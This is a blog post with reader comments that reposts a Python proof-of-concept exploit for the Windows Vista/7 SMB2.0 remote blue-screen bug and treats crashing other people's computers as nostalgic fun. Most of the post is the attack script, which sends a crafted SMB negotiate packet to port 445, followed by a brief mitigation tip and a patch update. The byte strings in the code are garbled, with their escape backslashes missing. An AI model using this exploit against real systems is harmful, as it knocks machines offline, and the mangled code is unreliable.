Monday , 1 May 2017
Home » Technology » Development » Good times again with Remote BSOD

Good times again with Remote BSOD

Remember the good old days when you’re able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for the limited time offer only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.

Here’s the proof of concept. I’m going to keep a copy here just in case.

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"x00x00x00x90" # Begin SMB header: Session message
"xffx53x4dx42" # Server Component: SMB
"x72x00x00x00" # Negociate Protocol
"x00x18x53xc8" # Operation 0x18 & sub 0xc853
"x00x26"# Process ID High: --> :) normal value should be "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe"
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54"
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31"
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00"
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57"
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61"
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c"
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c"
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e"
"x30x30x32x00"

)
s = socket()

s.connect(host)
s.send(buff)
s.close()

To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.

Ah! The good old days again.

== Update ==

Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.

Original Post: Microsoft Security Advisory 975497 Released

== End Update ==

Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

About Justin Lee

Check Also

Apple WWDC 2014 Videos Podcast RSS Feed Generator using XSLT

I realised there isn’t any podcast subscription link for the Apple WWDC 2014 videos at …

2 comments

  1. The code does not work. The author has forgotten to add:
    from socket import socket
    Importing sleep is redundant, as it is not used in the code. I have made some minor changes and published it on http://bit.ly/Zf7P5.

    Unfortunately, I do not have a Vista/7 machine to try out the code. Have you tried it yet?

  2. @Hongster: No, the author didn’t forget to add
    from socket import socket
    Probably Justin missed out copying that line from the original article here.
    http://seclists.org/fulldisclosure/2009/Sep/39

    As for the sleep, it was used during his fuzzing as i feel he don’t wanna flood it.

    The code does work.

    @Justin: There is another SMB bug in Win 7 and Win 2008 R2 discussed here.
    http://seclists.org/fulldisclosure/2009/Nov/134

    Have Fun.
    🙂

Leave a Reply